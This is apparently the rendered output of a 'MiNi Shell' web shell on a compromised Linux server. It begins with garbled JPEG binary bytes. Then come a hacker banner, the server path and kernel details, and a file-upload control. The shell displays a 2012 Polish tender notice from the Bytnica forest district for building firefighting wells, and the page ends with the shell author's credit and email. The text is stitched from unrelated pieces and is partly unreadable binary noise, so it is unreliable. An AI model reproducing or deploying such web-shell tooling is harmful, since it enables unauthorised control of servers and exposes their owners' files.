JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/82344-N-2012.html

<p class="kh_header"><b>Bytnica: Budowa punktów czerpania wody</b><br>
<b>Numer ogłoszenia: 82344 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bytnica , Bytnica 160, 66-630 Bytnica, woj. lubuskie, tel. 068 3915754, faks 068 3915754.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/editor-mode/pl/bip/dg/rdlp_zielona_gora/nadl_bytnica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowośco prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa punktów czerpania wody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie projektu wraz z wybudowaniem punktów czerpania wody na cele przeciwpożarowe.
UWAGA: Zadanie obejmuje zaprojektowanie i wykonanie punktów czerpania wody, z zastrzeżeniem, że przewiduje się jeden przenośny agregat prądotwórczy oraz 2 (dwa) zamontowane na stałe w otworach studziennych agregaty pompowe (pompa + silnik) na całe zadanie. 

I.Wykonanie projektu 2 punktów czerpania wody do celów przeciwpożarowych zawierającego: 
1.Wykonanie studni głębinowej zgodnie z projektem prac geologicznych  o wydajności 40m3/h wraz z obudową studzienną przy uwzględnieniu poniższych założeń:
a)głębokość otworu uzależniona jest od osiągnięcia wymaganych wydajności. Zakłada się wykonanie otworu do głębokości 40m,
W przypadku nieosiągnięcia lustra wody zakłada się ewentualne wykonanie otworu do 80m, przy czym wykonawca zobowiązany jest do uzyskania stosownych pozwoleń. 
b)zaprojektować agregat (pompa + silnik), który musi  zapewniać wydajność 40m3/h przy najniższym poziomie wody, z wysokością podnoszenia do końca króćca tłocznego zapewniającą wydajność min. 10 dm3/s i ciśnienie min. 2 bary,
c)obudowa studzienna wykonana z kręgów betonowych na korku betonowym z płytą betonową uzbrojoną w dwa włazy i kominek wentylacyjny,
d)wewnątrz obudowy studziennej należy zaprojektować przyłącze elektryczne do szybkiego połączenia z agregatem prądotwórczym
e)na płycie betonowej powinno być zainstalowane przyłącze w celu poboru wody przez pojazdy p-poż oraz napełniania zbiornika (hydrant)
2.Wykonanie zbiornika pomiarowego o pojemności 4m3, z brzegami i dnem wyłożonymi matą bentonitową, umocnionymi teokratą, wypełnioną materiałem z wykopu (warstwa 15 cm) i żwirem (warstwa 15 cm). Zejście do wody umożliwione poprzez schody drewniane. Jeden brzeg musi umożliwiać swobodne zejście dla zwierzyny do wody. Część zbiornika musi mieć głębokość min 1m zapewniając możliwość zanurzenia pomp pływających w celu poboru wody do celów gaśniczych oraz wykonania pomiarów wydajności i ciśnienia.
3.Wykonanie stanowiska czerpania wody (placu manewrowego) o wymiarach 20m x 20m z tłucznia, utwardzonego, o nośności min 10 ton i nacisku na 1 oś min 5 ton. Wymagania zgodne z Rozporządzeniem Ministra Środowiska z dnia 22 marca 2006 r. w sprawie szczegółowych zasad zabezpieczenia przeciwpożarowego lasów (Dz.U. nr 58, poz. 405 ze zm. oraz nr 82, poz. 573)
4.Zaprojektowanie agregatu prądotwórczego o parametrach dostosowanych do agregatu pompowego (pompa+silnik) tak, by mogła spełniać wymagania wydajności i ciśnienia określonych w pkt. 1 lit. b. 
5.Wykonanie utwardzonego miejsca pod agregat prądotwórczy o wymiarach dopasowanych do zastosowanego agregatu
6.Podłączenie studni do zbiornika pomiarowego oraz zagospodarowanie miejsca wokół zbiornika (wyrównanie terenu)

I.IProjekt obejmuje:
1.Projekt budowlano-wykonawczy
2.Plan bezpieczeństwa i ochrony zdrowia (BIOZ)
3.Specyfikacje techniczne wykonania i odbioru robót
4.Kosztorys inwestorski

II.Wybudowanie 2 punktów czerpania wody do celów przeciwpożarowych składających się ze studni głębinowej wraz z obudową studzienną i urządzeniami technicznymi, zbiornika pomiarowego, placu manewrowego, a także zapewnienie agregatu prądotwórczego z możliwością podłączenia najaśnicy i agregatu pompowego (pompa+silnik), zgodnie z projektem prac geologicznych oraz sporządzoną dokumentacją projektową,  umową oraz wytycznymi zawartymi w niniejszej SIWZ z uwzględnieniem konieczności:
1.Uzyskania wymaganych decyzji i zezwoleń do rozpoczęcia prac budowlanych i wiertniczych za wyjątkiem zatwierdzonego projektu prac geologicznych, który jest w posiadaniu Zamawiającego i stanowi załącznik nr 7 do SIWZ oraz zgłoszenia budowlanego.
2.Zgłoszenia do właściwego Urzędu Górniczego rozpoczęcia prac wiertniczych oraz zapewnienia nadzoru uprawnionego hydrologa.
3.Wykonanie otworów studziennych metodą wskazaną w wydanych przez starostwa decyzjach.
4.Pobierania próbek i opracowania dokumentacji hydrologicznej ujęcia wody ustalającej zasoby eksploatacyjne zgodnie z Rozporządzeniem Ministra Środowiska z dnia 3 października 2005 r. w sprawie szczegółowych wymagań jakie muszą spełniać dokumentacje hydrogeologiczne i geologiczno-inżynierskie. (Dz. U. nr 201, poz. 1673).
5.Zatwierdzenia dokumentacji hydrologicznej przez właściwego Starostę.
6.Wykonania operatu wodnoprawnego i uzyskanie pozwolenia na pobór wód podziemnych.
7.W przypadku konieczności wykonania głębszego otworu niż określonego w decyzji Starosty należy uzyskać wymagane zgody na przegłębienie otworu.
8.Wykonania pompowań pomiarowo sprawdzających do uzyskania Q= 40m3/h
9.Pobrania prób wody celem poddania jej analizie fizyko-chemicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt 6 ustawy Pzp, nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.11.12.00-0, 45.24.72.70-3, 45.23.31.20-6, 45.23.23.00-8, 45.25.51.10-3, 45.26.22.00-9, 31.22.41.00-3, 31.68.21.00-1, 31.68.21.10-4, 38.42.11.00-3, 44.16.42.00-9, 31.12.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje wniesienie wadium w wysokości 4.000,00 zł (słownie złotych: cztery tysiące)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia:
a)  Wykonawca musi wykazać się doświadczeniem w wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy 
    - w tym okresie -  co najmniej 6 robót polegających na wykonaniu studni 
    głębinowej o głębokości co najmniej 40 m wraz z niezbędną infrastrukturą.
b)Wykonawca musi wykazać się doświadczeniem w wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie -  co najmniej 6 robót polegających na wykonaniu projektu studni głębinowej o głębokości co najmniej  40 m wraz z niezbędną infrastrukturą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, w szczególności:
a)Geologa nadzoru - posiadającego kwalifikacje uprawniające w zakresie nadzorowana robót hydrogeologicznych oraz dokumentowania zasobów wód podziemnych.
b)Kierownika wierceń - posiadającego kwalifikacje średniego dozoru wiertniczego potwierdzone przez Okręgowy Urząd Górniczy. 
c)Brygadzistę wiertacza - posiadającego kwalifikacje niższe górnicze do prowadzenia prac wiertniczych.
d)Kierownika budowy - wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie wymaganym dla wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać aktualne ubezpieczenie z tytułu prowadzonej działalności gospodarczej na kwotę co najmniej 200.000,00 zł związane z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość wprowadzenia istotnych zmian do zawartej umowy w formie pisemnego aneksu w następujących okolicznościach:
1)Termin wykonania przedmiotu umowy może ulec przedłużeniu o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)przekazania terenu budowy,
b)zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób  
   dodatkowych nieobjętych umową,
c)zmiany terminu dokonania odbiorów przewidzianych w umowie.
2)Termin wykonania przedmiotu umowy może ulec przedłużeniu także w następujących przypadkach: 
a)konieczności przeprowadzenia wykopalisk uniemożliwiających wykonanie robót,
b)wystąpienia szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  siły wyższej, klęski żywiołowej
c)odnalezienia niewypałów i niewybuchów,
3)Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego , w szczególności :
a)wstrzymanie robót przez  Zamawiającego,
4)Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności:
a)przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
b)odmowy wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
5)Głębokość odwiertu może ulec zwiększeniu maksymalnie do 80 m, gdy z przyczyn niezależnych od Zamawiającego okaże się, że pokład wody czerpalnej znajduje się na innej głębokości, niż przewiduje to dokumentacja. 
6)Pozostałe zmiany 
a)w przypadku rezygnacji  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługujące  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami (z zastrzeżeniem zapisu SIWZ dotyczącego odwiertu negatywnego),
b)w przypadku  kolizji z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w specyfikacji IWZ i ofercie wykonawcy,
c)jeśli zmiana ustawowej stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT,   
d)jeśli  zmiana  ustawowej stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT,  
e)w przypadku, technicznej lub ekonomicznej nieopłacalności wykonania studni (zwłaszcza braku możliwości osiągnięcia zakładanej w projekcie wydajności), Zamawiający zastrzega sobie prawo odstąpienia od dokonywania wyposażenia wywierconej studni.
      W przypadku zmniejszenia głębokości otworu, wynagrodzenie 
      Wykonawcy zostanie odpowiednio zmniejszone o kwotę wynikającą ze 
      zmiany głębokości otworu i stawek jednostkowych przedstawionych w części w szczegółowej kosztorysu ofertowego. W przypadku potrzeby zwiększenia głębokości otworu wynagrodzenie Wykonawcy zostanie zwiększone w drodze negocjacji z zastrzeżeniem, że stawka jednostkowa wiercenia nie może być wyższa od przedstawionej w części szczegółowej kosztorysu ofertowego. 
f)w razie wystąpienia okoliczności, o których  mowa w art. 3571 Kc.
2. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)opis zmiany,
2)uzasadnienie zmiany,
3)koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych  okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/editor-mode/pl/bip/dg/rdlp_zielona_gora/nadl_bytnica/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego: Nadleśnictwo Bytnica, Bytnica 160, 66-630 Bytnica, pokój nr 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 11:00, miejsce: Siedziba zamawiającego: Nadleśnictwo Bytnica, Bytnica 160, 66-630 Bytnica, pokój nr 6 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com